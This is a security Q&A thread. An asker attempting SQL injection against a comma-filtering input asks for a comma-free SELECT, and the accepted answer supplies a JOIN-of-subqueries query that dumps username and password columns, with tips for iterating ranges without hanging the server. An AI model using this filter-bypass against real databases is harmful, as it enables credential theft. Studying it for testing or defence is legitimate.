# How make SQL select query without comma?

Tags: sql-injection, databases

I am trying SQLi and comma was filtered there. How make **SELECT** SQL request without a comma?

Comment: http://www.pentest.co.uk/events/bsidesmcr-2014.html

Comment: "Questions asking us to break the security of a specific system for you are off-topic" - I think this question is pretty general and it is valid for all database systems, not just, lets say, for Oracle DB. I think this was closed only so moderator gets any points for activity.

Answer (score 4, accepted):

Lets say you need to retrive `USERNAME,PASSWORD` columns form `USERTABLE`.

In this example The `USERTABLE` has data as shown below

```
mysql> SELECT * FROM USERTABLE;
+----------+------------+
| USERNAME | PASSWORD   |
+----------+------------+
| ALICE    | ALICEPASS  |
| BOB      | BOBPASS    |
| ALICE2   | ALICE2PASS |
| BOB2     | BOB2PASS   |
+----------+------------+
4 rows in set (0.00 sec)
```

Now the SQL with out a comma (,) to retrive both username and password can be like below

```
SELECT * FROM (SELECT USERNAME FROM USERTABLE WHERE USERNAME>"A" AND USERNAME<"B")UT1 JOIN (SELECT PASSWORD FROM USERTABLE WHERE USERNAME>"A" AND USERNAME<"B")UT2 ON  UT1.USERNAME=UT2.PASSWORD OR 1=1
```

The output is as follows

```
mysql> SELECT * FROM (SELECT USERNAME FROM USERTABLE WHERE USERNAME<"B")UT1 JOIN
 (SELECT PASSWORD FROM USERTABLE WHERE USERNAME<"B")UT2 ON  UT1.USERNAME=UT2.PAS
SWORD OR 1=1;
+----------+------------+
| USERNAME | PASSWORD   |
+----------+------------+
| ALICE    | ALICEPASS  |
| ALICE2   | ALICEPASS  |
| ALICE    | ALICE2PASS |
| ALICE2   | ALICE2PASS |
+----------+------------+
4 rows in set (0.00 sec)
```

You should **carefully** put the filters at `FROM USERTABLE WHERE USERNAME<"B"`.
If you put something like `FROM USERTABLE WHERE USERNAME<"Z"` you will probably hang the SQL server due to large join.

Just to mention if you think the database is very huge then polish your filters like `USERNAME>"AA" AND USERNAME<"AF"` so that a small set of data is being operated and its quick. In next iteration you can use `USERNAME>"AF" AND USERNAME<"AL"`  and so on.

And observe you got the combinations CROSSJOIN of usernames and passwords.
You will get  `N X N` rows .And you may consider rows at multiples of N like `N,2N,3N` etc for valid combination of usernames and passwords atleast in case of Mysql.

For some other database software may be you will need to try all the combinations of `USERNAME,PASSWORD` you retrieved.